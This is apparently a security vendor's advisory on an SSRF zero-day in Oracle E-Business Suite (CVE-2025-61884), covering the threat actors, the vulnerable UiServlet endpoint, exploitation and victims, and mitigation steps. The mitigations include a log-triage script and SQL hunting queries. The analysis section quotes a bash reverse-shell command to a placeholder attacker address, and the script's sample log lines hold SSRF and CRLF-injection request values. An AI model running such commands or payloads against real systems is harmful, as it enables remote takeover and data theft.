
Oracle E-Business Suite Zero-Day Exploit Leaked by ShinyHunters: CVE-2025-61884 Analysis and Mitigation Guide

  • Rescana
  • Oct 15
  • 4 min read

Executive Summary

Oracle has recently addressed a critical zero-day vulnerability in Oracle E-Business Suite (EBS), following the public leak of an exploit by the notorious threat group ShinyHunters. This vulnerability, tracked as CVE-2025-61884, enables unauthenticated remote attackers to perform Server-Side Request Forgery (SSRF) attacks, potentially leading to unauthorized access to internal resources and, under certain conditions, remote code execution (RCE). The exploit was actively weaponized in the wild, with multiple organizations suffering breaches and extortion attempts. Notably, Oracle released the patch silently, without initial public disclosure of the exploit’s existence or its active exploitation. This advisory provides a comprehensive technical analysis, threat actor profiling, exploitation details, victimology, and actionable mitigation guidance for all organizations using Oracle E-Business Suite.

Threat Actor Profile

ShinyHunters is a prolific cybercriminal group known for high-profile data breaches, extortion, and the public release of exploit code. The group operates primarily on underground forums and encrypted messaging platforms, such as Telegram, where they disseminate proof-of-concept (PoC) exploits and stolen data. ShinyHunters has a history of targeting enterprise software vulnerabilities, leveraging zero-days for both direct attacks and for sale to other threat actors. In this campaign, ShinyHunters not only exploited the SSRF flaw in Oracle E-Business Suite but also distributed the exploit to a wider criminal ecosystem, amplifying the threat. The group’s tactics, techniques, and procedures (TTPs) include rapid weaponization of newly discovered vulnerabilities, extortion through data theft, and collaboration with ransomware operators such as Clop.

Technical Analysis of Malware/TTPs

The vulnerability CVE-2025-61884 resides in the /OA_HTML/configurator/UiServlet endpoint of Oracle E-Business Suite. The flaw is a classic SSRF, where the application fails to properly validate user-supplied input in the return_url parameter. By crafting a malicious HTTP request, an attacker can coerce the server into making arbitrary requests to internal or external systems. This can be leveraged to access sensitive internal services, enumerate network infrastructure, or chain with other vulnerabilities for further exploitation.

The exploit, as leaked by ShinyHunters, involves sending a specially crafted request to the vulnerable endpoint, embedding a malicious URL in the return_url parameter. In some observed attack chains, adversaries combined SSRF with CRLF injection and XSL template injection, escalating the attack to achieve remote code execution. For example, attackers could inject payloads that execute shell commands, such as spawning a reverse shell using bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1. The exploit was effective even against systems that had applied previous Oracle patches, underscoring the sophistication of the attack and the necessity of the dedicated fix for CVE-2025-61884.

The patch released by Oracle introduces strict input validation using regular expressions, specifically sanitizing the return_url parameter to block malicious input and prevent SSRF exploitation. However, the patch was released without a public advisory, leaving many organizations unaware of the urgency to apply it.

Exploitation in the Wild

Following the public leak of the exploit by ShinyHunters, multiple threat actors, including the Clop ransomware group, began actively exploiting the vulnerability. Attackers launched automated scans for exposed Oracle E-Business Suite instances, targeting organizations across various sectors. Extortion campaigns were observed, with attackers exfiltrating sensitive data and threatening public disclosure unless ransom demands were met.

Notably, a breach at Harvard University was linked to exploitation of this zero-day, as reported by BleepingComputer. Attackers sent extortion emails to affected organizations, often using compromised third-party accounts to bypass spam filters. The campaigns were global in scope, affecting organizations in North America, Europe, and Asia-Pacific.

Indicators of compromise (IOCs) associated with these attacks include unauthorized access to the /OA_HTML/configurator/UiServlet endpoint, suspicious outbound connections from EBS servers, and the presence of malicious templates or payloads in the EBS database. Attackers also leveraged Java-based loaders and executed reconnaissance commands as the applmgr user to map internal networks and identify further targets.

Victimology and Targeting

The exploitation campaign was indiscriminate, targeting any organization running vulnerable versions of Oracle E-Business Suite. Sectors affected include higher education (notably Harvard), financial services, manufacturing, and multinational enterprises. The global reach of Oracle EBS meant that organizations in North America, Europe, and Asia-Pacific were all impacted. Attackers prioritized organizations with internet-exposed EBS instances, but also targeted those with weak internal segmentation, allowing lateral movement post-compromise.

Victims typically received extortion emails threatening the release of stolen data. In some cases, attackers demonstrated access by sharing samples of exfiltrated information. The use of infostealer malware and compromised third-party accounts further complicated detection and response efforts, as attackers were able to bypass traditional email security controls.

Mitigation and Countermeasures

Immediate action is required for all organizations using Oracle E-Business Suite. The following countermeasures are recommended:

Apply the latest Oracle E-Business Suite security updates, ensuring that the patch for CVE-2025-61884 is installed. This patch introduces critical input validation to block SSRF exploitation.

If immediate patching is not feasible, implement a web application firewall (WAF) or mod_security rule to block access to the /OA_HTML/configurator/UiServlet endpoint. This can disrupt the SSRF exploit chain and provide temporary protection.

Review application and network logs for evidence of suspicious access to /OA_HTML/configurator/UiServlet and /OA_HTML/SyncServlet endpoints. Pay particular attention to requests containing external or malformed URLs in the return_url parameter.
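The two recommendations above, strict validation of return_url (the approach the fix is described as taking) and review of access logs for the two endpoints, can be exercised together. The script below is an added example written for this advisory, not code from Rescana or Oracle: it applies an illustrative allowlist to return_url (only rooted, same-application relative paths pass; absolute or scheme-relative URLs, backslashes and CR/LF control characters are flagged) and uses that rule to triage Apache/NCSA-style access-log lines. The log format is an assumption, and the sample lines, client addresses and timestamps are constructed for illustration using documentation address ranges.

```python
"""Access-log triage for the Oracle EBS endpoints named in this advisory.

Added example, not code from Rescana or Oracle. Assumes Apache/NCSA combined
log lines; the sample lines below are constructed for illustration.
"""
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoints the advisory says to review access to.
WATCHED_PATHS = ("/OA_HTML/configurator/UiServlet", "/OA_HTML/SyncServlet")

# NCSA combined format: client ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def classify_return_url(value: str) -> Optional[str]:
    """Return a reason if a return_url value looks hostile, else None.

    Illustrative allowlist in the spirit of the fix described in the advisory
    (not Oracle's actual patch logic): accept only a rooted, same-application
    path such as "/OA_HTML/x" and flag everything else.
    """
    decoded = unquote(value)  # decode once more to also catch double-encoding
    if not decoded:
        return None
    # Check control characters before urlsplit(), which silently strips \t \r \n.
    if re.search(r"[\x00-\x1f\x7f]", decoded):
        return "control characters (possible CRLF injection)"
    parts = urlsplit(decoded)
    if parts.scheme or parts.netloc:
        return f"absolute or scheme-relative URL ({parts.netloc or parts.scheme})"
    if decoded.startswith("//") or "\\" in decoded:
        return "scheme-relative or backslash-bearing path"
    if not decoded.startswith("/"):
        return "not a rooted relative path"
    return None


def scan_access_log(lines) -> List[dict]:
    """Return one finding per request to a watched endpoint.

    Every hit is recorded (severity "info") so analysts can baseline normal
    traffic; hits whose return_url fails classify_return_url are "high".
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if not target.path.startswith(WATCHED_PATHS):
            continue
        params = parse_qs(target.query, keep_blank_values=True)
        reasons = [r for r in map(classify_return_url, params.get("return_url", [])) if r]
        findings.append({
            "client": m.group("client"),
            "time": m.group("time"),
            "method": m.group("method"),
            "path": target.path,
            "status": int(m.group("status")),
            "severity": "high" if reasons else "info",
            "reasons": reasons,
        })
    return findings


# Constructed sample lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2025:09:12:01 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5120
10.0.0.5 - - [10/Oct/2025:09:12:05 +0000] "GET /OA_HTML/configurator/UiServlet?return_url=%2FOA_HTML%2FRF.jsp HTTP/1.1" 200 812
203.0.113.77 - - [10/Oct/2025:09:13:44 +0000] "GET /OA_HTML/configurator/UiServlet?return_url=http%3A%2F%2F198.51.100.9%2Fcb HTTP/1.1" 200 640
203.0.113.77 - - [10/Oct/2025:09:13:47 +0000] "POST /OA_HTML/SyncServlet?return_url=%2F%2F198.51.100.9%2Fx HTTP/1.1" 500 0
203.0.113.77 - - [10/Oct/2025:09:13:50 +0000] "GET /OA_HTML/configurator/UiServlet?return_url=%2Fx%0D%0AX-Injected%3A%201 HTTP/1.1" 200 640
"""

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f["severity"].upper(), f["time"], f["client"], f["method"], f["path"],
              "; ".join(f["reasons"]))
```

Run against a real access log by replacing SAMPLE_LOG.splitlines() with the opened file. Recording every hit on the watched endpoints, not only the hostile ones, lets the baseline of legitimate configurator traffic be compared with the burst of automated scanning the advisory describes; the "high" findings are the ones to pivot on when checking outbound connections and the template tables.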

Monitor for unusual outbound connections from EBS servers, which may indicate successful SSRF exploitation or data exfiltration.

Query the EBS database for recently created or modified templates, especially those with suspicious names or payloads. Use the following SQL queries as a starting point:

SELECT * FROM XDO_TEMPLATES_B ORDER BY CREATION_DATE DESC;
SELECT * FROM XDO_LOBS ORDER BY CREATION_DATE DESC;

Restrict outbound internet access from EBS servers to only essential destinations, minimizing the attack surface for SSRF and data exfiltration.

Educate IT and security staff about the risk of zero-day exploitation and the importance of rapid patch management, especially for internet-facing enterprise applications.

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to continuously monitor, assess, and mitigate cyber risks across their entire supply chain. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify vulnerabilities, respond to emerging threats, and ensure compliance with industry standards. For more information about how Rescana can help secure your organization’s digital ecosystem, or for any questions regarding this advisory, please contact us at ops@rescana.com.